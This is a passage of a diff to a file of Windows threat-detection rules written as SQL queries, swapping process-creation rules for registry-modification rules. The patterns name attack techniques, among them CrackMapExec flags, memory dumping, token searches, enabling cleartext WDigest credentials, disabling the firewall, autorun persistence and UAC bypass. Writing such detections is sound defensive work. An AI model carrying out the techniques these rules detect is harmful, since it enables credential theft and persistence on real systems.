'%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + 
"author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create 
%' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" - }, - { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine 
LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". 
They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "DHCP 
Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. 
This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE 
'\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez 
(Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", - "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of Setres" + "New printer port install on host" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", - "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": 
